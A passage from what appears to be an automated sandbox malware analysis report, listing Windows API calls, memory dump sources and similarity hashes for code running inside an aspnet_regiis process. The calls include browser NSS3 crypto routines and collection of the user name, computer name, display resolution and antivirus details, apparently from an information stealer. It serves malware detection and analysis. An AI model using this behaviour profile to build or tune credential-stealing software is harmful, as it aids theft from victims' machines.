                                                                                                                                                                                • Part of subcall function 6CC909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC90D7E
                                                                                                                                                                              • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CBB2D54
                                                                                                                                                                                • Part of subcall function 6CC909D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC90BCB
                                                                                                                                                                                • Part of subcall function 6CC909D0: EnterCriticalSection.KERNEL32(?), ref: 6CC90BDE
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(?), ref: 6CC90C16
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                              • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                                                                                                              • API String ID: 420000887-1567254798
                                                                                                                                                                              • Opcode ID: 5a0715ec0d1c49827ef353fb1e82f3f18c51a4f05e1d8dc786205034433630c4
                                                                                                                                                                              • Instruction ID: 13b5259d0492abf0c1270ea11254b277263e11edea18ccff4f474c82141bb7f1
                                                                                                                                                                              • Opcode Fuzzy Hash: 5a0715ec0d1c49827ef353fb1e82f3f18c51a4f05e1d8dc786205034433630c4
                                                                                                                                                                              • Instruction Fuzzy Hash: 4521CF75200195AFDB409B94DD9CBA93BB1EB4B31AF448125F508A7622EF308D49CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(Aborting,?,6CB72357), ref: 6CC90EB8
                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CB72357), ref: 6CC90EC0
                                                                                                                                                                              • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CC90EE6
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_Now.NSS3 ref: 6CC90A22
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC90A35
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC90A66
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_GetCurrentThread.NSS3 ref: 6CC90A70
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC90A9D
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC90AC8
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_vsmprintf.NSS3(?,?), ref: 6CC90AE8
                                                                                                                                                                                • Part of subcall function 6CC909D0: EnterCriticalSection.KERNEL32(?), ref: 6CC90B19
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC90B48
                                                                                                                                                                                • Part of subcall function 6CC909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC90C76
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_LogFlush.NSS3 ref: 6CC90C7E
                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CC90EFA
                                                                                                                                                                                • Part of subcall function 6CB7AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CB7AF0E
                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F16
                                                                                                                                                                              • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F1C
                                                                                                                                                                              • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F25
                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F2B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                              • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                              • API String ID: 3905088656-1374795319
                                                                                                                                                                              • Opcode ID: 17041ab4b72eb09c6669ff6ae96c08d8e5f3b78a1c430c15e12419dd0fdebf2b
                                                                                                                                                                              • Instruction ID: 8d5d0681d23990df723bd2a2704f82934c0e43c4096fd8dd196d9a763d2eefc1
                                                                                                                                                                              • Opcode Fuzzy Hash: 17041ab4b72eb09c6669ff6ae96c08d8e5f3b78a1c430c15e12419dd0fdebf2b
                                                                                                                                                                              • Instruction Fuzzy Hash: 11F062B59001147BEE017FA0DC4AC9B3F3DDF86664F044464FD0956602EA36F914D6B3
                                                                                                                                                                              APIs
                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(6CBF2C2A), ref: 6CBF0C81
                                                                                                                                                                                • Part of subcall function 6CBDBE30: SECOID_FindOID_Util.NSS3(6CB9311B,00000000,?,6CB9311B,?), ref: 6CBDBE44
                                                                                                                                                                                • Part of subcall function 6CBC8500: SECOID_GetAlgorithmTag_Util.NSS3(6CBC95DC,00000000,00000000,00000000,?,6CBC95DC,00000000,00000000,?,6CBA7F4A,00000000,?,00000000,00000000), ref: 6CBC8517
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBF0CC4
                                                                                                                                                                                • Part of subcall function 6CBDFAB0: free.MOZGLUE(?,-00000001,?,?,6CB7F673,00000000,00000000), ref: 6CBDFAC7
                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CBF0CD5
                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CBF0D1D
                                                                                                                                                                              • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CBF0D3B
                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CBF0D7D
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBF0DB5
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBF0DC1
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBF0DF7
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBF0E05
                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBF0E0F
                                                                                                                                                                                • Part of subcall function 6CBC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CBA7F4A,00000000,?,00000000,00000000), ref: 6CBC95E0
                                                                                                                                                                                • Part of subcall function 6CBC95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CBA7F4A,00000000,?,00000000,00000000), ref: 6CBC95F5
                                                                                                                                                                                • Part of subcall function 6CBC95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CBC9609
                                                                                                                                                                                • Part of subcall function 6CBC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CBC961D
                                                                                                                                                                                • Part of subcall function 6CBC95C0: PK11_GetInternalSlot.NSS3 ref: 6CBC970B
                                                                                                                                                                                • Part of subcall function 6CBC95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CBC9756
                                                                                                                                                                                • Part of subcall function 6CBC95C0: PK11_GetIVLength.NSS3(?), ref: 6CBC9767
                                                                                                                                                                                • Part of subcall function 6CBC95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CBC977E
                                                                                                                                                                                • Part of subcall function 6CBC95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBC978E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3136566230-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB22F3D
                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6CB22FB9
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,00000000,?), ref: 6CB23005
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6CB230EE
                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB23131
                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB23178
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                              • API String ID: 984749767-598938438
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,09ED2488), ref: 02A1B9C5
                                                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 02A1BA3E
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 02A1BA5A
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 02A1BA6E
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 02A1BA77
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 02A1BA87
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 02A1BAA5
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 02A1BAB5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2979504256-3916222277
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CBAAB7F,?,00000000,?), ref: 6CBA4CB4
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6CBAAB7F,?,00000000,?), ref: 6CBA4CC8
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,6CBAAB7F,?,00000000,?), ref: 6CBA4CE0
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6CBAAB7F,?,00000000,?), ref: 6CBA4CF4
                                                                                                                                                                              • PL_HashTableLookup.NSS3(?,?,?,6CBAAB7F,?,00000000,?), ref: 6CBA4D03
                                                                                                                                                                              • PR_Unlock.NSS3(?,00000000,?), ref: 6CBA4D10
                                                                                                                                                                                • Part of subcall function 6CC2DD70: TlsGetValue.KERNEL32 ref: 6CC2DD8C
                                                                                                                                                                                • Part of subcall function 6CC2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC2DDB4
                                                                                                                                                                              • PR_Now.NSS3(?,00000000,?), ref: 6CBA4D26
                                                                                                                                                                                • Part of subcall function 6CC49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DC6
                                                                                                                                                                                • Part of subcall function 6CC49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DD1
                                                                                                                                                                                • Part of subcall function 6CC49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC49DED
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CBA4D98
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CBA4DDA
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CBA4E02
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4032354334-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB82CDA,?,00000000), ref: 6CB82E1E
                                                                                                                                                                                • Part of subcall function 6CBDFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CB89003,?), ref: 6CBDFD91
                                                                                                                                                                                • Part of subcall function 6CBDFD80: PORT_Alloc_Util.NSS3(A4686CBE,?), ref: 6CBDFDA2
                                                                                                                                                                                • Part of subcall function 6CBDFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CBE,?,?), ref: 6CBDFDC4
                                                                                                                                                                              • SECITEM_DupItem_Util.NSS3(?), ref: 6CB82E33
                                                                                                                                                                                • Part of subcall function 6CBDFD80: free.MOZGLUE(00000000,?,?), ref: 6CBDFDD1
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB82E4E
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB82E5E
                                                                                                                                                                              • PL_HashTableLookup.NSS3(?), ref: 6CB82E71
                                                                                                                                                                              • PL_HashTableRemove.NSS3(?), ref: 6CB82E84
                                                                                                                                                                              • PL_HashTableAdd.NSS3(?,00000000), ref: 6CB82E96
                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CB82EA9
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB82EB6
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB82EC5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3332421221-0
                                                                                                                                                                              • Opcode ID: 9cef41021601aebf62fe336d508ac8ab4f46b9165f5cc8de15ba4da213e5e896
                                                                                                                                                                              • Instruction ID: 6b87d9c5e2f737aff1351f82fdb79ba916f18c451c3620eae2692f93893ed62e
                                                                                                                                                                              • Opcode Fuzzy Hash: 9cef41021601aebf62fe336d508ac8ab4f46b9165f5cc8de15ba4da213e5e896
                                                                                                                                                                              • Instruction Fuzzy Hash: B8210772A00141ABEF205B28EC0AA9A3B78DB5635EF090030ED1882751FB32D559C7B2
                                                                                                                                                                              APIs
                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CB0B999), ref: 6CB0CFF3
                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CB0B999), ref: 6CB0D02B
                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CB0B999), ref: 6CB0D041
                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CB0B999), ref: 6CC5972B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                              • API String ID: 491875419-598938438
                                                                                                                                                                              • Opcode ID: 46f6569611440bd7c115368c07a86676ff3bc3695894b4def172c0801208b3c1
                                                                                                                                                                              • Instruction ID: 03b41ffd4d6b781b2f8657d068c9f368434ffbf4269cd710251dde9055b2dbb3
                                                                                                                                                                              • Opcode Fuzzy Hash: 46f6569611440bd7c115368c07a86676ff3bc3695894b4def172c0801208b3c1
                                                                                                                                                                              • Instruction Fuzzy Hash: 43615871A002508FD710CF69C840BA6BBF5EF55358F6845AEE4489FB82E376D847C7A2
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlen.KERNEL32(?,76DD5460,?,00000000), ref: 02A0DBBB
                                                                                                                                                                              • strchr.MSVCRT ref: 02A0DBCD
                                                                                                                                                                              • strchr.MSVCRT ref: 02A0DBF2
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A0DCF7), ref: 02A0DC14
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0DC21
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DC28
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DC6F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heaplstrlenstrchr$AllocateProcessstrcpy_s
                                                                                                                                                                              • String ID: 0123456789ABCDEF
                                                                                                                                                                              • API String ID: 1327626442-2554083253
                                                                                                                                                                              • Opcode ID: e0f1092ac3d1425f904253463e261686b4e83651ee2d29e2dbb67806787a0205
                                                                                                                                                                              • Instruction ID: 9ceb185f1b46ba0fd6d95e39591809f3dcd9f6d7f2cddaa636cb8b8b27d8e9ee
                                                                                                                                                                              • Opcode Fuzzy Hash: e0f1092ac3d1425f904253463e261686b4e83651ee2d29e2dbb67806787a0205
                                                                                                                                                                              • Instruction Fuzzy Hash: 19313972D006199FDB00DFE8DD84AAEBBB9EF09355F100569E901FB280DB75A905CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • UnDecorator::getArgumentList.LIBCMT ref: 02A1F969
                                                                                                                                                                                • Part of subcall function 02A1F504: Replicator::operator[].LIBCMT ref: 02A1F587
                                                                                                                                                                                • Part of subcall function 02A1F504: DName::operator+=.LIBCMT ref: 02A1F58F
                                                                                                                                                                              • DName::operator+.LIBCMT ref: 02A1F9C2
                                                                                                                                                                              • DName::DName.LIBCMT ref: 02A1FA1A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                              • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                              • API String ID: 834187326-2211150622
                                                                                                                                                                              • Opcode ID: 42ad580ff243b403dc847bdf9a7f2c608af2d3ab5a1321d8872e6ebd30ac4b20
                                                                                                                                                                              • Instruction ID: cc8d030dc3b28af0e754e1e72090d0b359d6f9e27e5d7ea70e523744f88daa8a
                                                                                                                                                                              • Opcode Fuzzy Hash: 42ad580ff243b403dc847bdf9a7f2c608af2d3ab5a1321d8872e6ebd30ac4b20
                                                                                                                                                                              • Instruction Fuzzy Hash: F4218031641795AFCB11EF1CE484AA67BF4FB05369B048085E846CF76ADF30D942CB40
                                                                                                                                                                              APIs
                                                                                                                                                                              • UnDecorator::UScore.LIBCMT ref: 02A212E7
                                                                                                                                                                              • DName::DName.LIBCMT ref: 02A212F3
                                                                                                                                                                                • Part of subcall function 02A1EFBE: DName::doPchar.LIBCMT ref: 02A1EFEF
                                                                                                                                                                              • UnDecorator::getScopedName.LIBCMT ref: 02A21332
                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 02A2133C
                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 02A2134B
                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 02A21357
                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 02A21364
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                              • String ID: void
                                                                                                                                                                              • API String ID: 1480779885-3531332078
                                                                                                                                                                              • Opcode ID: 15eb3bb9ca4047c94e6bbb18bf8953f3d579105e52208811f58d8c42860c0db1
                                                                                                                                                                              • Instruction ID: a236ec45ae57b28849cce92c5662ab6236e24232bbde887f12cdaa89f8392b3c
                                                                                                                                                                              • Opcode Fuzzy Hash: 15eb3bb9ca4047c94e6bbb18bf8953f3d579105e52208811f58d8c42860c0db1
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B11C671944258AFDB05EB2CCA59AAE7BB5BB00318F0440D9E41ADB692DF309A49CB40
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 02A11575
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 02A11580
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02A1158B
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02A11596
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,02A14098,?,Display Resolution: ,02A368F4,00000000,User Name: ,02A368E4,00000000,Computer Name: ,02A368D0,AV: ,02A368C4), ref: 02A115A2
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02A115A9
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A115BB
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDeviceHeap$AllocateCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                              • String ID: %dx%d
                                                                                                                                                                              • API String ID: 81802983-2206825331
                                                                                                                                                                              • Opcode ID: 64d2c35dea96a4fc4cb5dc6f8e7520a3556cdb9f6fdc1c835dc30f187b950798
                                                                                                                                                                              • Instruction ID: 970a35282ff0faabaeb8a2cafb0e5b83fbf94c9d18ee33f6abd289d699d847aa
                                                                                                                                                                              • Opcode Fuzzy Hash: 64d2c35dea96a4fc4cb5dc6f8e7520a3556cdb9f6fdc1c835dc30f187b950798
                                                                                                                                                                              • Instruction Fuzzy Hash: 7AF06832D81330BBE7111FE59C4DE9B7E6CEF4A6A1B004951F606F2150D6B59EA08BA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CBCCD08
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6CBCCE16
                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CBCD079
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1351604052-0
